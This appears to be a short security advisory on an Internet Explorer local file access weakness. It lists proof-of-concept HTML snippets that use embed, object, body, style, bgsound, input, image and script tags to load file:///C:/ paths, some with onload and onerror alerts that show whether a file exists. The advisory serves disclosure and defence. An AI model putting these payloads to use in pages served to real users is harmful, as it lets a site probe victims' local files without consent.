|
|
Microsoft Internet Explorer Local File Access Weakness
An attacker may exploit these issues by enticing victims into viewing malicious HTML content. The following proof-of-concept HTML code is available: - Embed Tag Local file Access: <EMBED SRC="file:///C:/example.pdf" HEIGHT=600 WIDTH=1440></EMBED> - Object & Param Tag Local File Access: <object type="audio/x-mid" data="file:///C:/example.mid" width="200" height="20"> <param name="src" value="file:///C:/example.mid"> <param name="autoStart" value="true"> <param name="autoStart" value="0"> </object> - Body Tag Local File Access: <body background="file:///C:/example.gif" onload="alert('loading body bgrd success')" onerror="alert('loading body bgrd error')"> - Style Tag Local File Access: <STYLE type="text/css">BODY{background:url("file:///C:/example.gif")} </STYLE> - Bgsound Tag Local File Access: <bgsound src="file:///C:/example.mid" id="soundeffect" loop=1 autostart= "true"/> - Input Tag Local File Access: <form> <input type="image" src="file:///C:/example.gif" onload="alert('loading input success')" onerror="alert('loading input error')"> </form> - Image Tag Local File Access: <img src="file:///C:/example.jpg" onload="alert('loading image success')" onerror="alert('loading image error')"> - Script Tag Local File Access: <script src="file:///C:/example.js"></script> |
|
Privacy Statement |